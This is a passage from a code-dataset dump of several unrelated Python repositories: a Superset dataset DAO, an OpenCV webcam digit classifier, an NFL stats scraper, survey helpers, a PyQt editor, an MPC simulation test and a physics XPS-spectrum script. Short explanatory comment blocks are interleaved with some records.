TableColumn.id.in_(columns_ids)\n )\n ).all()\n return len(columns_ids) == len(dataset_query)\n\n @staticmethod\n def validate_columns_uniqueness(dataset_id: int, 
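# --- Hedged distillation of the validate_* helpers above: they all reduce
# to one SQLAlchemy idiom -- build a filtered query, then ask the database
# whether any matching row EXISTS, so nothing is fetched just to be
# counted. A self-contained toy version (the table and engine here are
# stand-ins, not Superset's models):
import sqlalchemy as sa

engine = sa.create_engine("sqlite://")
meta = sa.MetaData()
datasets = sa.Table("datasets", meta, sa.Column("name", sa.String))
meta.create_all(engine)

with engine.connect() as conn:
    conn.execute(datasets.insert().values(name="sales"))
    stmt = sa.select(sa.exists().where(datasets.c.name == "sales"))
    assert conn.execute(stmt).scalar()   # "sales" taken -> name not unique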
columns_names: list[str]) -> bool:\n dataset_query = (\n db.session.query(TableColumn.id).filter(\n TableColumn.table_id == dataset_id,\n TableColumn.column_name.in_(columns_names),\n )\n ).all()\n return len(dataset_query) == 0\n\n @staticmethod\n def validate_metrics_exist(dataset_id: int, metrics_ids: list[int]) -> bool:\n dataset_query = (\n db.session.query(SqlMetric.id).filter(\n SqlMetric.table_id == dataset_id, SqlMetric.id.in_(metrics_ids)\n )\n ).all()\n return len(metrics_ids) == len(dataset_query)\n\n @staticmethod\n def validate_metrics_uniqueness(dataset_id: int, metrics_names: list[str]) -> bool:\n dataset_query = (\n db.session.query(SqlMetric.id).filter(\n SqlMetric.table_id == dataset_id,\n SqlMetric.metric_name.in_(metrics_names),\n )\n ).all()\n return len(dataset_query) == 0\n\n @classmethod\n def update(\n cls,\n item: SqlaTable | None = None,\n attributes: dict[str, Any] | None = None,\n commit: bool = True,\n ) -> SqlaTable:\n \"\"\"\n Updates a Dataset model on the metadata DB\n \"\"\"\n\n if item and attributes:\n if \"columns\" in attributes:\n cls.update_columns(\n item,\n attributes.pop(\"columns\"),\n commit=commit,\n override_columns=bool(attributes.get(\"override_columns\")),\n )\n\n if \"metrics\" in attributes:\n cls.update_metrics(item, attributes.pop(\"metrics\"), commit=commit)\n\n return super().update(item, attributes, commit=commit)\n\n @classmethod\n def update_columns(\n cls,\n model: SqlaTable,\n property_columns: list[dict[str, Any]],\n commit: bool = True,\n override_columns: bool = False,\n ) -> None:\n \"\"\"\n Creates/updates and/or deletes a list of columns, based on a\n list of Dict.\n\n - If a column Dict has an `id` property then we update.\n - If a column Dict does not have an `id` then we create a new metric.\n - If there are extra columns on the metadata db that are not defined on the List\n then we delete.\n \"\"\"\n\n if override_columns:\n db.session.query(TableColumn).filter(\n TableColumn.table_id == model.id\n ).delete(synchronize_session=\"fetch\")\n\n db.session.bulk_insert_mappings(\n TableColumn,\n [\n {**properties, \"table_id\": model.id}\n for properties in property_columns\n ],\n )\n else:\n columns_by_id = {column.id: column for column in model.columns}\n\n property_columns_by_id = {\n properties[\"id\"]: properties\n for properties in property_columns\n if \"id\" in properties\n }\n\n db.session.bulk_insert_mappings(\n TableColumn,\n [\n {**properties, \"table_id\": model.id}\n for properties in property_columns\n if not \"id\" in properties\n ],\n )\n\n db.session.bulk_update_mappings(\n TableColumn,\n [\n {**columns_by_id[properties[\"id\"]].__dict__, **properties}\n for properties in property_columns_by_id.values()\n ],\n )\n\n db.session.query(TableColumn).filter(\n TableColumn.id.in_(\n {column.id for column in model.columns}\n - property_columns_by_id.keys()\n )\n ).delete(synchronize_session=\"fetch\")\n\n if commit:\n db.session.commit()\n\n @classmethod\n def update_metrics(\n cls,\n model: SqlaTable,\n property_metrics: list[dict[str, Any]],\n commit: bool = True,\n ) -> None:\n \"\"\"\n Creates/updates and/or deletes a list of metrics, based on a\n list of Dict.\n\n - If a metric Dict has an `id` property then we update.\n - If a metric Dict does not have an `id` then we create a new metric.\n - If there are extra metrics on the metadata db that are not defined on the List\n then we delete.\n \"\"\"\n\n metrics_by_id = {metric.id: metric for metric in model.metrics}\n\n property_metrics_by_id = {\n 
properties[\"id\"]: properties\n for properties in property_metrics\n if \"id\" in properties\n }\n\n db.session.bulk_insert_mappings(\n SqlMetric,\n [\n {**properties, \"table_id\": model.id}\n for properties in property_metrics\n if not \"id\" in properties\n ],\n )\n\n db.session.bulk_update_mappings(\n SqlMetric,\n [\n {**metrics_by_id[properties[\"id\"]].__dict__, **properties}\n for properties in property_metrics_by_id.values()\n ],\n )\n\n db.session.query(SqlMetric).filter(\n SqlMetric.id.in_(\n {metric.id for metric in model.metrics} - property_metrics_by_id.keys()\n )\n ).delete(synchronize_session=\"fetch\")\n\n if commit:\n db.session.commit()\n\n @classmethod\n def find_dataset_column(cls, dataset_id: int, column_id: int) -> TableColumn | None:\n # We want to apply base dataset filters\n dataset = DatasetDAO.find_by_id(dataset_id)\n if not dataset:\n return None\n return (\n db.session.query(TableColumn)\n .filter(TableColumn.table_id == dataset_id, TableColumn.id == column_id)\n .one_or_none()\n )\n\n @classmethod\n def find_dataset_metric(cls, dataset_id: int, metric_id: int) -> SqlMetric | None:\n # We want to apply base dataset filters\n dataset = DatasetDAO.find_by_id(dataset_id)\n if not dataset:\n return None\n return db.session.query(SqlMetric).get(metric_id)\n\n @staticmethod\n def get_table_by_name(database_id: int, table_name: str) -> SqlaTable | None:\n return (\n db.session.query(SqlaTable)\n .filter_by(database_id=database_id, table_name=table_name)\n .one_or_none()\n )\n\n\nclass DatasetColumnDAO(BaseDAO[TableColumn]):\n pass\n\n\nclass DatasetMetricDAO(BaseDAO[SqlMetric]):\n pass\n","repo_name":"apache/superset","sub_path":"superset/daos/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":10144,"program_lang":"python","lang":"en","doc_type":"code","stars":55269,"dataset":"github-code","pt":"61"} +{"seq_id":"16623104131","text":"import cv2\nfrom joblib import load\nfrom parse import image_parse, label_parse\n\n\ndef show_webcam(mirror=False):\n clf_sgd = load(\"clf-sgd.joblib\")\n clf_lbfgs = load(\"newclf.joblib\")\n i = 0\n cam = cv2.VideoCapture(1)\n newImage = cam.read()\n while True:\n ret_val, img = cam.read()\n # img, contonours, thresh = get_img_contour_thresh(img)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n img1 = cv2.GaussianBlur(gray, (35, 35), 0)\n img12 = cv2.GaussianBlur(gray, (11, 11), 0)\n img13 = cv2.GaussianBlur(gray, (51, 51), 0)\n img2 = cv2.blur(gray, (35, 35))\n ret, thresh1 = cv2.threshold(img12, 100, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)\n # thresh2 = thresh1[25:25 + 450, 25:25 + 575]\n thresh2 = thresh1\n contours, hierarchy = cv2.findContours(thresh2, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n if len(contours) > 0:\n contour = max(contours, key=cv2.contourArea)\n # contour = contours[0]\n if cv2.contourArea(contour) > 1000:\n print(\"Test \" + str(i))\n i += 1\n x, y, w, h = cv2.boundingRect(contour)\n temp = adjustBox(x, y, w, h)\n x = int(temp[0])\n w = int(temp[1])\n cv2.rectangle(img, (x,y), (x+w, y+h), (200,255,200), 2)\n z = int(x + (h/2))\n newImage = thresh1[y:y + h, x:x + w]\n newImage = cv2.resize(newImage, (20,20))\n newImage = newImage / 255.0\n color = [0, 0, 0]\n newImage = cv2.copyMakeBorder(newImage, 4, 4, 4, 4, cv2.BORDER_CONSTANT, value=color)\n print(newImage)\n # newImageUpdate = newImageUpdate / 255.0\n prediction_sgd = clf_sgd.predict(newImage.reshape(1, -1))\n prediction_lbfgs = clf_lbfgs.predict(newImage.reshape(1, -1))\n cv2.putText(img, \"Prediction sgd: \" + 
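# --- Hedged summary of update_columns()/update_metrics() above: both sync a
# child collection against an incoming list of dicts in three steps --
# bulk-insert items without an "id", bulk-update items with one, and delete
# rows whose ids were not sent. The partition step in plain Python (the
# helper name and payload shape are ours, mirroring the DAO's):
def partition_payload(existing_ids, payload):
    to_insert = [p for p in payload if "id" not in p]
    to_update = [p for p in payload if "id" in p]
    to_delete = existing_ids - {p["id"] for p in to_update}
    return to_insert, to_update, to_delete

ins, upd, gone = partition_payload({1, 2, 3}, [{"id": 1, "x": "a"}, {"x": "b"}])
assert ins == [{"x": "b"}] and upd == [{"id": 1, "x": "a"}] and gone == {2, 3}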
str(prediction_sgd), (50, 375), cv2.FONT_HERSHEY_PLAIN, 3, (255, 255, 0), 2)\n cv2.putText(img, \"Prediction new: \" + str(prediction_lbfgs), (50, 450), cv2.FONT_HERSHEY_PLAIN, 3, (255, 0, 255), 2)\n \n cv2.imshow('original', img)\n # cv2.imshow('original2', img)\n cv2.imshow('threshold', thresh1)\n # cv2.imshow('threhold2', thresh2)\n # cv2.imshow('test images', newImage)\n cv2.imshow('predict image', newImage)\n # cv2.imshow('test', test)\n if cv2.waitKey(1) == 27: \n break # esc to quit\n cv2.destroyAllWindows()\n\ndef adjustBox(x, y, w, h):\n totalW = 650\n totalH = 400\n\n if h > w:\n delta = h - w\n newW = w + delta\n if x > delta/2:\n newX = x - (delta/2)\n if newX + newW < totalW:\n x = newX\n w = newW\n \n return (x, w)\n\ndef main():\n show_webcam(mirror=True)\n\n\nif __name__ == '__main__':\n main()","repo_name":"Jake-Cloud/machine-learning-project","sub_path":"webcam.py","file_name":"webcam.py","file_ext":"py","file_size_in_byte":2949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23533482728","text":"from fantasy_football import get_active_players, parse_game_log\nfrom database_handler import DatabaseHandler\nfrom string import ascii_uppercase\nfrom time import sleep\n\n\ndef consume(first_letter):\n player_db = DatabaseHandler()\n players = get_active_players(first_letter)\n for player in players:\n first_name = player.get('name', '').split(' ')[0]\n last_name = player.get('name', '').split(' ')[1]\n position = player.get('position')\n url = player.get('link')\n player_id = player_db.write_player(\n first_name, last_name, position, url)\n game_dict = parse_game_log(url)\n for game in game_dict:\n player_db.write_game(player_id, game)\n # Take a rest between players so pro football ref doesn't get upset\n sleep(1)\n\n\ndef get_all_active_players():\n for first_letter in ascii_uppercase:\n consume(first_letter)\n\n\ndef scrape():\n for letter in ascii_uppercase:\n consume(letter)\n","repo_name":"alexk307/nfldb","sub_path":"player_ingestion.py","file_name":"player_ingestion.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8096785923","text":"from src.entities.group import Group\nfrom src.entities.student import Student\nfrom src.services.user_service import user_service\nfrom src.tools.rankings_converter import convert_to_list\nfrom datetime import datetime\n\ndef convert_choices_groups(survey_choices):\n \"\"\"\n Converts database data into the class \"Group\", which is used in the sorting algorithm\n\n args:\n survey_choices: The list of choices for a survey\n \"\"\"\n groups = {}\n for choice in survey_choices:\n groups[choice[0]] = Group(choice[0], choice[2], choice[3])\n return groups\n\ndef convert_users_students(user_rankings):\n \"\"\"\n Converts database data into the class \"Student\", which is used in the sorting algorithm\n\n args:\n user_rankings: The list of user rankings for a survey\n \"\"\"\n students = {}\n for user_ranking in user_rankings:\n user_id = user_ranking[0]\n name = user_service.get_name(user_id)\n ranking = convert_to_list(user_ranking[1])\n int_ranking = [int(i) for i in ranking]\n int_rejections = []\n if user_ranking[2]:\n if len(user_ranking[2])>0:\n rejections = convert_to_list(user_ranking[2])\n int_rejections = [int(i) for i in rejections]\n students[user_id] = Student(user_id, name, int_ranking, int_rejections)\n return students\n\ndef get_happiness(survey_choice_id, 
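# --- Hedged note on the ROI preparation in show_webcam above: the crop is
# resized to 20x20, scaled to [0, 1], then padded with a 4-pixel black
# border -- i.e. the classic 28x28 MNIST layout the pickled classifiers
# were presumably trained on. The same steps in isolation:
import cv2
import numpy as np

roi = np.random.randint(0, 256, (64, 48), dtype=np.uint8)   # stand-in crop
digit = cv2.resize(roi, (20, 20)) / 255.0
digit = cv2.copyMakeBorder(digit, 4, 4, 4, 4, cv2.BORDER_CONSTANT, value=0)
assert digit.shape == (28, 28)
features = digit.reshape(1, -1)    # 784 features, as fed to clf.predict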
user_ranking):\n \"\"\"\n A function for getting the ordinal number of the survey_choice which the student ended in. E.G rankings = \"2,4,5,1,3\" and they\n got chosen for 4, the function returns 2.\n\n args:\n survey_choice_id: The id of the survey choice in which the student was selected into\n user_ranking: The ranking of the user for the survey\n \"\"\"\n ranking_list = convert_to_list(user_ranking)\n happiness = 0\n for choice_id in ranking_list:\n happiness += 1\n if survey_choice_id == int(choice_id):\n break\n return happiness\n \ndef convert_date(data):\n \"\"\"\n Convert a datetime object to a dd.mm.yyyy string\n\n args:\n data: The datetime object\n \"\"\"\n day = check_if_zero_needed(str(data.day))\n month = check_if_zero_needed(str(data.month))\n year = str(data.year)\n date = day + \".\" + month + \".\" + year\n return date\n \ndef convert_time(data):\n \"\"\"\n Convert a datetime object to a hh:mm string\n\n args:\n data: The datetime object\n \"\"\"\n time_hour = check_if_zero_needed(str(data.hour))\n time_minute = check_if_zero_needed(str(data.minute))\n time = time_hour + \":\" + time_minute\n return time\n\ndef check_if_zero_needed(unit):\n \"\"\"\n Add a 0 to the start of the unit if it's length is 1.\n\n args:\n unit: hour/minute/day/month of a datetime object\n \"\"\"\n if len(unit) == 1:\n unit = \"0\"+ unit\n return unit\n","repo_name":"piryopt/pienryhmien-optimointi","sub_path":"src/tools/survey_result_helper.py","file_name":"survey_result_helper.py","file_ext":"py","file_size_in_byte":2838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4304778937","text":"#!/usr/bin/python\nfrom PyQt4 import QtCore, QtGui\nimport os\n\n\nclass MainWindow(QtGui.QMainWindow):\n def __init__(self, parent=None):\n super(MainWindow, self).__init__(parent)\n\n self.setupFileMenu()\n self.setupHelpMenu()\n self.setupEditor()\n self.fname = None\n\n self.setCentralWidget(self.editor)\n self.setWindowTitle(\"QtPyEditV2\")\n\n def about(self):\n QtGui.QMessageBox.about(self, \"About Syntax Highlighter\",\n \"
The Syntax Highlighter example shows how to \" \\\n \"perform simple syntax highlighting by subclassing the \" \\\n \"QSyntaxHighlighter class and describing highlighting \" \\\n \"rules using regular expressions.
\")\n\n def newFile(self):\n self.fname = None\n self.editor.clear()\n\n def openFile(self, path=None):\n with open(\"filetype.txt\") as f:\n fmt = f.readline().strip(\"\\n\")\n if not path:\n path = QtGui.QFileDialog.getOpenFileName(self, \"Open File\",\n '', fmt)\n\n if path:\n inFile = QtCore.QFile(path)\n if inFile.open(QtCore.QFile.ReadOnly | QtCore.QFile.Text):\n text = inFile.readAll()\n\n try:\n # Python v3.\n text = str(text, encoding='ascii')\n except TypeError:\n # Python v2.\n text = str(text)\n\n self.editor.setPlainText(text)\n\n def setupEditor(self):\n font = QtGui.QFont()\n font.setFamily('Courier')\n font.setFixedPitch(True)\n font.setPointSize(10)\n\n self.editor = QtGui.QTextEdit()\n self.editor.setFont(font)\n\n self.highlighter = Highlighter(self.editor.document())\n\n def saveFile(self):\n if not self.fname:\n self.fname = QtGui.QFileDialog.getSaveFileName(self, \"Save As...\",\n '')\n with open(str(self.fname), 'w') as f:\n f.write(self.editor.toPlainText())\n #t = os.popen(\"sed -f sub.sed %s\" % self.fname).read()\n #f.seek(0)\n #f.write(t)\n \n\n def setupFileMenu(self):\n fileMenu = QtGui.QMenu(\"&File\", self)\n self.menuBar().addMenu(fileMenu)\n\n fileMenu.addAction(\"&New...\", self.newFile, \"Ctrl+N\")\n fileMenu.addAction(\"&Open...\", self.openFile, \"Ctrl+O\")\n fileMenu.addAction(\"&Save\", self.saveFile, \"Ctrl+S\")\n fileMenu.addAction(\"E&xit\", QtGui.qApp.quit, \"Ctrl+Q\")\n\n def setupHelpMenu(self):\n helpMenu = QtGui.QMenu(\"&Help\", self)\n self.menuBar().addMenu(helpMenu)\n\n helpMenu.addAction(\"&About\", self.about)\n helpMenu.addAction(\"About &Qt\", QtGui.qApp.aboutQt)\n\n\nclass Highlighter(QtGui.QSyntaxHighlighter):\n def __init__(self, parent=None):\n super(Highlighter, self).__init__(parent)\n\n keywordFormat = QtGui.QTextCharFormat()\n keywordFormat.setForeground(QtCore.Qt.darkBlue)\n keywordFormat.setFontWeight(QtGui.QFont.Bold)\n\n with open(\"keyword.txt\") as f:\n keywordPatterns = [s.strip(\"\\n\") for s in f.readlines()]\n\n self.highlightingRules = [(QtCore.QRegExp(pattern), keywordFormat)\n for pattern in keywordPatterns]\n\n classFormat = QtGui.QTextCharFormat()\n classFormat.setFontWeight(QtGui.QFont.Bold)\n classFormat.setForeground(QtCore.Qt.darkMagenta)\n self.highlightingRules.append((QtCore.QRegExp(\"\\\\bQ[A-Za-z]+\\\\b\"),\n classFormat))\n\n singleLineCommentFormat = QtGui.QTextCharFormat()\n singleLineCommentFormat.setForeground(QtCore.Qt.red)\n singleLineCommentFormat.setFontWeight(QtGui.QFont.Bold)\n self.highlightingRules.append((QtCore.QRegExp(\"#[^\\n]*\"),\n singleLineCommentFormat))\n\n self.multiLineCommentFormat = QtGui.QTextCharFormat()\n self.multiLineCommentFormat.setForeground(QtCore.Qt.red)\n self.multiLineCommentFormat.setFontWeight(QtGui.QFont.Bold)\n\n quotationFormat = QtGui.QTextCharFormat()\n quotationFormat.setForeground(QtCore.Qt.darkGreen)\n quotationFormat.setFontWeight(QtGui.QFont.Bold)\n self.highlightingRules.append((QtCore.QRegExp(\"\\\".*\\\"\"),\n quotationFormat))\n\n functionFormat = QtGui.QTextCharFormat()\n functionFormat.setFontItalic(True)\n functionFormat.setForeground(QtCore.Qt.blue)\n self.highlightingRules.append((QtCore.QRegExp(\"\\\\b[A-Za-z0-9_]+(?=\\\\()\"),\n functionFormat))\n\n self.commentStartExpression = QtCore.QRegExp(\"#\\\\*\")\n self.commentEndExpression = QtCore.QRegExp(\"\\n\")\n\n def highlightBlock(self, text):\n for pattern, format in self.highlightingRules:\n expression = QtCore.QRegExp(pattern)\n index = expression.indexIn(text)\n while index >= 0:\n length 
= expression.matchedLength()\n self.setFormat(index, length, format)\n index = expression.indexIn(text, index + length)\n\n self.setCurrentBlockState(0)\n\n startIndex = 0\n if self.previousBlockState() != 1:\n startIndex = self.commentStartExpression.indexIn(text)\n\n while startIndex >= 0:\n endIndex = self.commentEndExpression.indexIn(text, startIndex)\n\n if endIndex == -1:\n self.setCurrentBlockState(1)\n commentLength = len(text) - startIndex\n else:\n commentLength = endIndex - startIndex + self.commentEndExpression.matchedLength()\n\n self.setFormat(startIndex, commentLength,\n self.multiLineCommentFormat)\n startIndex = self.commentStartExpression.indexIn(text,\n startIndex + commentLength);\n\n\nif __name__ == '__main__':\n\n import sys\n\n app = QtGui.QApplication(sys.argv)\n window = MainWindow()\n window.resize(640, 512)\n window.show()\n sys.exit(app.exec_())\n\n","repo_name":"anirudhb/ma_desktop","sub_path":"scripts2/test_fixed.py","file_name":"test_fixed.py","file_ext":"py","file_size_in_byte":6039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23369470741","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nfrom work import run_closed_loop_simulation\n\nif __name__ == \"__main__\":\n params = {\n \"M\": 7,\n \"x_last\": np.array([1.0, 0.0, 0.0]),\n \"N\": 40,\n \"Nsim\": 1000,\n \"dt\": 20 / 3600,\n \"epsilon_0\": 100.0,\n \"epsilon_rate\": 0.2,\n }\n res_reg = run_closed_loop_simulation(\n problem=\"mass_chain\",\n problem_params=params,\n rrlb=False,\n show_plot=False,\n # generate_code=False,\n # build_solver=False,\n )\n # plt.suptitle(\"Mass Chain - Regular MPC\")\n # res_rrlb = run_closed_loop_simulation(\n # problem=\"mass_chain\",\n # params=params,\n # rrlb=True,\n # show_plot=False,\n # # generate_code=False,\n # # build_solver=False,\n # )\n # plt.suptitle(\"Mass Chain - RRLB MPC\")\n print(f\"n_conv_reg: {res_reg['n_convergence']}\")\n # print(f\"n_conv_rrlb: {res_rrlb['n_convergence']}\")\n # print average runtimes\n print(\n f\"avg_time_reg: {1000*np.mean(res_reg['time_tot'])} ms, std: {1000*np.std(res_reg['time_tot'])} ms\"\n )\n # print(\n # f\"avg_time_rrlb: {1000*np.mean(res_rrlb['time_tot'])} ms, std: {1000*np.std(res_rrlb['time_tot'])} ms\"\n # )\n # plot time_tot\n plt.figure()\n plt.plot(1000 * res_reg[\"time_tot\"], label=\"regular\")\n # plt.plot(1000 * res_rrlb[\"time_tot\"], label=\"rrlb\")\n plt.legend()\n plt.ylabel(\"time [ms]\")\n plt.xlabel(\"time step\")\n plt.title(\"Runtimes\")\n\n # # plot epsilon\n # plt.figure()\n # plt.plot(res_rrlb[\"epsilon\"], label=\"rrlb\")\n # plt.legend()\n # plt.ylabel(\"$\\epsilon$\")\n # plt.xlabel(\"time step\")\n # plt.title(\"evolution barrier parameter $\\epsilon$\")\n\n # plot discrepancies\n plt.figure()\n plt.plot(res_reg[\"discrepancies\"], label=\"regular\")\n # plt.plot(res_rrlb[\"discrepancy\"], label=\"rrlb\")\n plt.legend()\n plt.ylabel(\"discrepancy\")\n plt.xlabel(\"time step\")\n plt.title(\"evolution discrepancy\")\n\n plt.show()\n","repo_name":"tudoroancea/paper_rrlb_mpc","sub_path":"tests/mass_chain_test.py","file_name":"mass_chain_test.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3336699050","text":"import numpy as np\nfrom numpy import linalg as la\nimport gmpy2\nimport matplotlib.pyplot as plt\nimport scipy.optimize as opt\n\nT = 1\n\ndef lamb() -> float:\n \"\"\"Common ratio parameter: lambda = 2\"\"\"\n 
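# --- Hedged check of the eNRG discretisation defined just below: with
# lambda = 2 the codiagonal hoppings t_n = (T / w) * lambda**(-n - 1/2)
# decay geometrically, t_{n+1} / t_n = 1 / lambda, which is what makes the
# effective energy grid logarithmic:
#
#     lam = 2.0
#     t = lambda n: lam ** (-n - 0.5)
#     assert all(abs(t(n + 1) / t(n) - 1 / lam) < 1e-12 for n in range(5))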
return 2.0\n\n\ndef int_w():\n return np.power(lamb(), np.linspace(-1, 1, 1000))\n\n\ndef int_epsilon():\n return np.power(10, np.linspace(-2, -5, 100))\n\n\ndef zeta():\n \"\"\"\" returns offset \"\"\"\n return 0\n\n\ndef t_n(n, w):\n \"\"\"Hopping energy of eNRG parametrization: n = number of states\"\"\"\n\n return T / w * np.power(lamb(), -n - 1 / 2)\n\n\ndef normaliz(n, w):\n \"\"\"returns RG renormalization factor, equal to smallest codiagonal element\"\"\"\n return t_n(n - 2, w)\n\n\ndef dig_ham(n, k, w):\n \"\"\"Hamiltonian: n(odd) = Matrix Dimension / k = scattering potential\"\"\"\n if n % 2 == 0:\n print(\"Sorry: n must be odd\")\n exit(1)\n\n if zeta() == 0:\n ham__ = np.zeros((n + 1, n + 1))\n ham__[0][0] = k\n ham__[0][1] = ham__[1][0] = T / np.sqrt(w)\n for i in range(1, (n + 1) - 1):\n ham__[i][i + 1] = ham__[i + 1][i] = t_n(i - 1, w)\n eval_, evec__ = la.eigh(ham__)\n return eval_, evec__.T, eval_ / normaliz(n, w)\n\n else:\n \"\"\"returns Hamiltonian with offset\"\"\"\n ham__ = np.zeros((n + 1, n + 1))\n ham__[zeta()][zeta()] = k\n ham__[0][zeta()] = ham__[zeta()][0] = T\n for i in range(zeta()):\n ham__[0][i] = ham__[i][0] = 0\n for i in range(zeta(), (n + 1) - 1):\n ham__[i][i + 1] = ham__[i + 1][i] = t_n(i - (1+zeta()), w)\n eval_, evec__ = la.eigh(ham__)\n return eval_, evec__.T, eval_ / normaliz(n, w)\n\n\ndef delta(n, k, w):\n \"\"\"\"returns phase shift / pi associated with potential scattering k\"\"\"\n ene0_ = dig_ham(n, 0, w)[2]\n ene_ = dig_ham(n, k, w)[2]\n nfermi3: int = int((n + 1) / 2 + 3)\n ret = np.log(ene_[nfermi3] / ene0_[nfermi3]) / np.log(np.power(lamb(), 2.0))\n\n return ret\n\n\ndef xps_proj(n, k, w, hole, head):\n \"\"\"Determinant of a projection of the final state over the initial: n = number of electrons in the conduction band\n hole = hole state below Fermi's level / head = particle state above Fermi's level / k = scattering potential\"\"\"\n nfermi = int((n + 1) / 2)\n mel = np.zeros((nfermi, nfermi))\n evali, eveci__, adm_eneri_ = dig_ham(n, 0, w)\n evalf, evecf__, adm_enerf_ = dig_ham(n, k, w)\n for bra in range(n):\n for ket in range(nfermi):\n if bra == hole:\n mel[bra][ket] = np.dot(evecf__[head], eveci__[ket])\n if bra < nfermi and bra != hole:\n mel[bra][ket] = np.dot(evecf__[bra], eveci__[ket])\n ener_excit = evalf[head] - evalf[hole]\n ener_norm = ener_excit / normaliz(n, w)\n return ener_excit, np.power(la.det(mel), 2), ener_norm\n\n\ndef spectrum(ni, nf, k, w, head):\n \"\"\"\"compute xps rates for a logarithmic sequence of energies of a fixed head\"\"\"\n n_erg: int = int((nf - ni) / 2)\n erg_ = np.zeros((n_erg))\n rate_ = np.zeros_like(erg_)\n erg_norm_ = np.zeros_like(rate_)\n\n count = 0\n for n in range(ni, nf, 2):\n nfermi = int((n + 1) / 2)\n n_hole = nfermi - head\n n_excit = nfermi + head - 1\n erg_[count], rate_[count], erg_norm_[count] = xps_proj(n, k, w, n_hole, n_excit)\n count += 1\n return erg_, rate_\n\n\ndef spectrum_sec(ni, nf, k, w, head):\n \"\"\"\"compute secondary xps rates for a logarithmic sequence of energies above a fixed head\"\"\"\n erg_sec_ = np.zeros((int((nf-ni)/2)*np.power(head - 1, 2)))\n rate_sec_ = np.zeros_like(erg_sec_)\n erg_sec_norm_ = np.zeros_like(erg_sec_)\n\n count = 0\n for n in range(ni, nf, 2):\n nfermi = int((n + 1) / 2)\n n_hole = nfermi - head\n n_excit = nfermi + head - 1\n for j in range(n_hole + 1, nfermi):\n for u in range(nfermi, n_excit):\n erg_sec_[count], rate_sec_[count], erg_sec_norm_[count] = xps_proj(n, k, w, j, u)\n count += 1\n return erg_sec_, rate_sec_\n\n\ndef 
convolution(ni, nf, k, w, head):\n \"\"\"compute xps rate with a convolution with a box function\"\"\"\n erg_, rate_ = spectrum(ni, nf, k, w, head)\n erg_sec_, rate_sec_ = spectrum_sec(ni, nf, k, w, head)\n erg_conv_ = np.zeros(len(rate_)-2)\n rate_conv_ = np.zeros_like(erg_conv_)\n soma = np.zeros(len(erg_)-2)\n for i in range(len(erg_)-2):\n for j in range(len(erg_sec_)):\n if np.sqrt(erg_[i+1]*erg_[i+2]) < erg_sec_[j] < np.sqrt(erg_[i]*erg_[i+1]):\n soma[i] += rate_sec_[j]\n rate_conv_[i] = (soma[i] + rate_[i+1]) / np.power(np.log(np.power(lamb(), 2)), 1)\n erg_conv_[i] = erg_[i+1]\n return erg_conv_, rate_conv_\n\n\ndef binarystates(n, head):\n \"\"\"List of every possible state for a number n\"\"\"\n nfermi = int((n+1)/2)\n decimal_states_ = []\n for i in range(2**(n+1)):\n nn = gmpy2.mpz(i)\n if gmpy2.popcount(nn) == nfermi:\n decimal_states_.append(nn)\n l = len(decimal_states_)\n filled__ = np.zeros((l, nfermi))\n list = []\n for j in range(l):\n count = 0\n for k in range(nfermi):\n level = gmpy2.bit_scan1(decimal_states_[j], count)\n filled__[j][k] = level\n count = level + 1\n for i in range(1, len(filled__)):\n for j in range(nfermi):\n #if j < nfermi - head:\n # if filled__[i][j] != filled__[0][j]:\n # list.append(i)\n if j > nfermi - head:\n if filled__[i][j] > nfermi + 2:\n list.append(i)\n return np.delete(filled__, list, 0)\n\n\ndef xps_proj_binary(n, k, w, head):\n \"\"\"compute all the xps ray (primary and secondary) for states in binary form\"\"\"\n m__ = binarystates(n, head)\n evali, eveci__, adm_eneri_ = dig_ham(n, 0, w)\n evalf, evecf__, adm_enerf_ = dig_ham(n, k, w)\n nfermi = int((n + 1) / 2)\n rate_ = np.zeros(len(m__)-1)\n erg_ = np.zeros(len(m__)-1)\n for state in range(1, len(m__)):\n mel = np.zeros((nfermi, nfermi))\n sum_hole = 0\n sum_excit = 0\n for bra in range(nfermi):\n for ket in range(nfermi):\n mel[bra][ket] = np.dot(evecf__[int(m__[state][bra])], eveci__[int(m__[0][ket])])\n ener_hole = evalf[int(m__[0][bra])]\n ener_excit = evalf[int(m__[state][bra])]\n sum_hole += ener_hole\n sum_excit += ener_excit\n erg_[state-1] = sum_excit - sum_hole\n rate_[state-1] = np.power(la.det(mel), 2)\n return erg_, rate_\n\ndef binary_convolution(ni, nf, k, w, head):\n \"\"\"compute all the xps ray for states in binary form with a convolution box function\"\"\"\n erg_, rate_ = spectrum(ni, nf, k, w, head)\n rate_conv_ = np.zeros(len(erg_) - 2)\n erg_conv_ = np.zeros_like(rate_conv_)\n for n in range(ni, nf-4, 2):\n ergs_, rates_ = xps_proj_binary(n, k, w, head)\n for i in range(len(erg_) - 2):\n for j in range(len(ergs_) - 2):\n if np.sqrt(erg_[i + 1] * erg_[i + 2]) < ergs_[j] < np.sqrt(erg_[i] * erg_[i + 1]):\n rate_conv_[i] += rates_[j]\n erg_conv_[i] = erg_[i+1]\n return erg_conv_, rate_conv_ / (np.log(np.power(lamb(), 2)))\n\n\ndef dig_ham_imp(n, k, d, v, w):\n \"\"\"Hamiltonian: n(odd) = Matrix Dimension / k = scattering potential / v = impurity bounding energy\"\"\"\n if n % 2 == 0:\n print(\"Sorry: n must be odd\")\n exit(1)\n\n else:\n ham__ = np.zeros((n + 1, n + 1))\n ham__[0][0] = d\n ham__[1][1] = k\n ham__[1][2] = ham__[2][1] = T / np.sqrt(w)\n ham__[0][1] = ham__[1][0] = v\n for i in range(2, (n + 1) - 1):\n ham__[i][i + 1] = ham__[i + 1][i] = t_n(i - 2, w)\n eval_, evec__ = la.eigh(ham__)\n return eval_, evec__.T, eval_ / normaliz(n, w)\n\n\ndef xps_proj_imp(n, k, d, 